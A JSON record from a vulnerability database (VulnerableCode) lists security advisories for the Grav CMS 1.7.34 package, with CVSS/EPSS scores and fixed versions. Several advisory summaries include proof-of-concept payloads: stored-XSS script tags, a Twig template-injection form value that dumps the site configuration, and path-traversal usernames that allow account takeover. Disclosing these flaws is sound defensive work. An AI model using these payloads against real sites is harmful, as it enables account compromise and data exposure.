{"url":"http://public2.vulnerablecode.io/api/packages/89049?format=json","purl":"pkg:composer/getgrav/grav@1.7.34","type":"composer","namespace":"getgrav","name":"grav","version":"1.7.34","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.0.0-beta.2","latest_non_vulnerable_version":"2.0.0-rc.2","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/10202?format=json","vulnerability_id":"VCID-13tt-ebbj-eyg8","summary":"Cross-site scripting (XSS) vulnerability in Grav\nA cross-site scripting (XSS) vulnerability in Grav versions 1.7.44 and before, allows remote authenticated attackers to execute arbitrary web scripts or HTML via the onmouseover attribute of an ISINDEX element.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-31506","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14642","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-31506"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-16T17:13:14Z/"}],"url":"https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-31506","reference_id":"","reference_typ
e":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-31506"},{"reference_url":"https://github.com/advisories/GHSA-xrf8-cmrg-7436","reference_id":"GHSA-xrf8-cmrg-7436","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xrf8-cmrg-7436"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/374278?format=json","purl":"pkg:composer/getgrav/grav@1.7.44","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.44"}],"aliases":["CVE-2023-31506
","GHSA-xrf8-cmrg-7436"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-13tt-ebbj-eyg8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29672?format=json","vulnerability_id":"VCID-19e3-3agd-bbc8","summary":"Grav Admin Plugin is vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/accounts/groups/[group]` parameter `data[readableName]`\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/accounts/groups/Grupo` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[readableName]` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/accounts/groups/Grupo`  \n**Parameter:** `data[readableName]`\n\nThe application fails to properly validate and sanitize user input in the `data[readableName]` parameter. This lack of input handling allows attackers to inject arbitrary script content that is stored in the application and executed in the browser of any user who views the affected group configuration.\n\n---\n\n## PoC\n\n**Payload:**\n\n`<ScRipT>alert('PoC-XSS')</ScRipT>`\n\n1. Navigate to **Accounts > Groups** in the administrative panel.\n    \n2. Create a new group or edit an existing one.\n    \n3. In the **Display Name** field (`data[readableName]`), insert the payload above and save the changes.\n\n![image](https://github.com/user-attachments/assets/e6db531e-9968-4fc5-8329-12183975096c)\n\n\nThe following HTTP request was generated during this action:\n![image](https://github.com/user-attachments/assets/37e9a2c6-f7be-45b4-8aaf-13e64940561f)\n\n\n4. 
Next, go to **Accounts > Users** and open any user profile.\n\n![image](https://github.com/user-attachments/assets/a09215ab-17a2-4b17-9b58-cf3737d95ba2)\n\n\n5. The malicious script is executed immediately in the browser when the page loads, confirming the existence of a **Stored XSS** vulnerability.\n\n![image](https://github.com/user-attachments/assets/8411ca04-4d84-4f88-9c6a-7dd88e65a6e0)\n\n\n---\n\n## Impact\n\nStored XSS vulnerabilities can result in serious consequences, including:\n\n- **Session hijacking:** Attackers can steal authentication cookies or tokens\n    \n- **Malware delivery:** Inserting scripts that download malicious content\n    \n- **Credential theft:** Capturing usernames and passwords through injected forms\n    \n- **Sensitive data exposure:** Accessing data stored in the browser or the application\n    \n- **Browser takeover:** Executing arbitrary commands in the user’s session\n    \n- **Phishing attacks:** Redirecting users to fake login or malicious sites\n    \n- **Website defacement:** Altering page content shown to users\n    \n- **Reputational damage:** Undermining trust in the platform or organization\n\nby 
[CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66312","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66312"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66312","
reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66312"},{"reference_url":"https://github.com/advisories/GHSA-rmw5-f87r-w988","reference_id":"GHSA-rmw5-f87r-w988","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rmw5-f87r-w988"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66312","GHSA-rmw5-f87r-w988"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-19e3-3agd-bbc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30052?format=json","vulnerability_id":"VCID-1gzk-uead-q7ch","summary":"Grav vulnerable to Information Disclosure via IDOR in Grav Admin Panel\n## **Summary**\n\nAn **IDOR (Insecure Direct Object Reference)** vulnerability in the Grav CMS Admin Panel allows **low-privilege users to access sensitive information** from other accounts.\nAlthough direct account takeover is not possible, **admin email addresses and other metadata can be exposed**, increasing the risk of phishing, credential stuffing, and social engineering.\n\n---\n\n## **Details**\n\n* **Endpoint:** `/admin/accounts/users/{username}`\n* **Tested Version:** Grav Admin 1.7.48\n* **Affected Accounts:** Authenticated users with **0 privileges** (non-privileged accounts)\n\n**Description:**\nRequesting another user’s account details (e.g., 
`/admin/accounts/users/admin`) as a low-privilege user returns an HTTP **403 Forbidden** response.\nHowever, sensitive information such as the **admin’s email address** is still present in the **response source**, specifically in the `<title>` tag.\n\n**system/src/Grav/Common/Flex/Types/Users/UserCollection.php**\n<img width=\"700\" height=\"327\" alt=\"Screenshot 2025-08-24 021027\" src=\"https://github.com/user-attachments/assets/7e69ae49-d8fc-442f-b00c-9efaec706b2e\" />\n\n**system/blueprints/flex/user-accounts.yaml**\n<img width=\"700\" height=\"300\" alt=\"Screenshot 2025-08-24 020521\" src=\"https://github.com/user-attachments/assets/756631c8-d60b-4b84-a08a-2a9c2f81b41f\" />\n\n\nThis is a classic **IDOR vulnerability**, where object references (usernames) are not properly protected from unauthorized enumeration.\n\n---\n\n## **PoC**\n\n1. Log in as a **non-privileged user** (0-privilege account).\n2. Access another user’s endpoint, for example:\n\n   ```\n   GET /admin/accounts/users/admin\n   ```\n3. Observe the HTTP **403 Forbidden** response.\n4. Inspect the **page source**; sensitive data such as the **admin email** can be seen in the `<title>` tag.\n\n**PoC Video:** \n\n[https://drive.google.com/file/d/1lY_qwqSkN5sPNmHvXGOk6R1mdIgVt71H/view](https://drive.google.com/file/d/1lY_qwqSkN5sPNmHvXGOk6R1mdIgVt71H/view)\n\n---\n\n## **Impact**\n\n* **Type:** Information Disclosure via IDOR\n* **Who is impacted:** Low-privilege authenticated users can enumerate other accounts and extract sensitive metadata (admin emails).\n* **Risk:** Exposed information can be used for targeted phishing, credential stuffing, brute-force attacks, or social engineering campaigns.\n* **Severity Justification:** Only a low-privilege account is required, and sensitive metadata is leaked. 
Arbitrary code execution is not possible, but the information exposure is **moderate risk**.\n\n---\n\n## **Disclosure & CVE Request**\n\n* We request a **CVE ID** for this vulnerability once validated.\n* Please credit the discovery to:\n\n  * **Elvin Nuruyev**\n  * **Kanan Farzalili**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66306","reference_id":"","reference_type":"","scores":[{"value":"0.00045","scoring_system":"epss","scoring_elements":"0.14243","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66306"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/"}],"url":"https://github.com/getgrav/grav/commit/b7e1958a6e807ac14919447b60e5204a2ea77f62"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:11:21Z/"}],"url"
:"https://github.com/getgrav/grav/security/advisories/GHSA-4cwq-j7jv-qmwg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66306","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66306"},{"reference_url":"https://github.com/advisories/GHSA-4cwq-j7jv-qmwg","reference_id":"GHSA-4cwq-j7jv-qmwg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4cwq-j7jv-qmwg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66306","GHSA-4cwq-j7jv-qmwg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1gzk-uead-q7ch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30323?format=json","vulnerability_id":"VCID-1kvz-tbnw-dyev","summary":"Grav is vulnerable to Server-Side Template Injection (SSTI) via Forms\n### Summary\nHaving a simple form on site can reveal the whole Grav configuration details (including plugin configuration details) by using the correct POST payload. Sensitive information may be contained in the configuration details.\n\n### PoC\nCreate a simple form with two fields, 'registration-number' and 'hp'. Add a submit button and set the method to POST(screenshot attached below). Form name set to 'hero-form'. 
Send a POST request with the following payload and you will notice a response with a php array listing the whole Grav configuration details - including plugins(screenshot attached).\n\nregistration-number:d643aaaa\n\nhp:vJyifp\n\n__form-name__:hero-form\n\n__unique_form_id__:{{var_dump(_context|slice(0,7))}}\n\n\n![Screenshot 2025-03-25 at 7 26 02 AM](https://github.com/user-attachments/assets/b92b099b-c07a-4ea2-a3f9-47361ceb9355)\n\n![Screenshot 2025-03-25 at 7 22 58 AM](https://github.com/user-attachments/assets/d9146fd3-5887-4bf8-87d9-78f43ade91c8)\n\n\n### Impact\nServer-Side Template (SST) vulnerability. The vulnerability affects the latest Grav version as of 25th of Match 2025 (1.7.48) with all plugins installed (including forms plugin v.7.4.2) to their latest versions as well.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66298","reference_id":"","reference_type":"","scores":[{"value":"0.0007","scoring_system":"epss","scoring_elements":"0.21487","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66298"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/"}],"url":"https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9
fa587c6458"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66298","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66298"},{"reference_url":"https://github.com/advisories/GHSA-8535-hvm8-2hmv","reference_id":"GHSA-8535-hvm8-2hmv","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8535-hvm8-2hmv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66298","GHSA-8535-hvm8-2hmv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1kvz-tbnw-dyev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29854?format=json","vulnerability_id":"VCID-2fzp-f93m-afe3","summary":"Grav vulnerable to Cross-Site Scripting (XSS) Stored 
endpoint `/admin/pages/[page]` in Multiples parameters\n## Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][metadata]`, `data[header][taxonomy][category]`, and `data[header][taxonomy][tag]` parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `POST /admin/pages/[page]`  \n**Parameters:**\n\n- `data[header][metadata]`\n    \n- `data[header][taxonomy][category]`\n    \n- `data[header][taxonomy][tag]`\n    \n\nThe application fails to properly sanitize user input when saving page metadata or taxonomy fields via the Admin Panel. As a result, an attacker with access to the admin interface can inject a malicious script using these parameters, and the script will be stored in the page's YAML frontmatter. When the page or metadata is rendered (especially in the Admin Panel), the payload is executed in the browser of any user with access.\n\n---\n\n## PoC\n\n**Payload:**\n\n`<script>alert('PoC-XXS51')</script>`\n\n### Steps to Reproduce:\n\n1. Log into the _Grav_ Admin Panel and navigate to **Pages**.\n    \n2. Create or edit a page.\n    \n3. Inject the payload above into any of the following fields in the Options tab:\n    \n    - **Metadata** key name\n        \n    - **Category** under Taxonomy\n        \n    - **Tag** under Taxonomy\n![image](https://github.com/user-attachments/assets/b66f3d4d-8f9d-40a9-83a8-5a365814c00b)\n\n![image](https://github.com/user-attachments/assets/a1164198-2e25-4746-acb5-71f4874aebbe)\n\n4. 
Save the page.\n![image](https://github.com/user-attachments/assets/6c9c0ba4-bce3-4a72-a10f-39b0b886a10c)\n\nWhen the page is loaded again in the Admin Panel or potentially on the frontend (depending on how the metadata is used), the script is executed, confirming the **Stored XSS** vulnerability.\n\n---\n\n## Impact\n\nStored XSS vulnerabilities can result in serious consequences, including:\n\n- **Session hijacking:** Attackers can steal authentication cookies or tokens\n    \n- **Malware delivery:** Injected scripts can download malicious software\n    \n- **Credential theft:** Fake input fields can capture usernames and passwords\n    \n- **Sensitive data exposure:** Access to internal metadata and browser data\n    \n- **Administrative access compromise:** Especially dangerous in admin-facing interfaces\n    \n- **Phishing attacks:** Users can be redirected to external malicious sites\n    \n- **Reputation damage:** Executing arbitrary scripts in trusted systems undermines credibility\n\nby 
[CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66311","reference_id":"","reference_type":"","scores":[{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07374","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66311"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T15:53:27Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66311","
reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66311"},{"reference_url":"https://github.com/advisories/GHSA-mpjj-4688-3fxg","reference_id":"GHSA-mpjj-4688-3fxg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mpjj-4688-3fxg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63236?format=json","purl":"pkg:composer/getgrav/grav@1.11.0-beta.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.11.0-beta.1"}],"aliases":["CVE-2025-66311","GHSA-mpjj-4688-3fxg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2fzp-f93m-afe3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29971?format=json","vulnerability_id":"VCID-31dk-jdqj-pfag","summary":"Grav vulnerable to Path traversal / arbitrary YAML write via user creation leading to Account Takeover / System Corruption\n### Summary\nWhen a user with privilege of user creation creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. 
In my tests,  I was able to cause the Admin UI to write the following content into arbitrary .yaml files (including files like email.yaml, system.yaml, or other site YAML files like admin.yaml) — demonstrating arbitrary YAML write / overwrite via the Admin UI.\n\nExample observed content written by the Admin UI (test data):\nusername: ..\\Nijat\nstate: enabled\nemail: [EMAIL@gmail.com](mailto:EMAIL@gmail.com)\nfullname: 'Nijat Alizada'\nlanguage: en\ncontent_editor: default\ntwofa_enabled: false\ntwofa_secret: RWVEIHC2AFVD6FCR6UHCO3DS4HWXKKDT\navatar: { }\nhashed_password: $2y$10$wl9Ktv3vUmDKCt8o6u2oOuRZr1I04OE0YZf2sJ1QcAherbNnk1XVC\naccess:\nsite:\nlogin: true\n\n\n### Steps to Reproduce\n1. Log in to the Grav Admin UI as an administrator.\n2. Create a new user with the following values (example):\n        a. Username: ..\\POC-TOKEN-2025-09-29\n        b. Fullname: POC-TOKEN-2025-09-29\n        c. Email: poc+2025-09-29@example.test\n        d. Password: (any password)\nObserve that a YAML file containing the POC-TOKEN is written outside user/accounts/ (for example in the parent directory of user/accounts)\n\n\n### Impact\n1. Config corruption / service disruption: Overwriting system.yaml, email.yaml, or plugin config files with attacker-controlled YAML (even if limited to fields present in account YAML) could break functionality, disable services, or cause misconfiguration requiring recovery from backups.\n2. 
Account takeover, any user with create user privilege can modify other user's email and password by just creating a new user with the name \"..\\accounts\\USERNAME_OF_VICTIM\"\n\n\n### Proof of Concept\nhttps://github.com/user-attachments/assets/cf503d74-f765-4031-8e22-71f6b3630847","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66295","reference_id":"","reference_type":"","scores":[{"value":"0.00104","scoring_system":"epss","scoring_elements":"0.28006","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66295"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/"}],"url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv","reference_id":"","reference_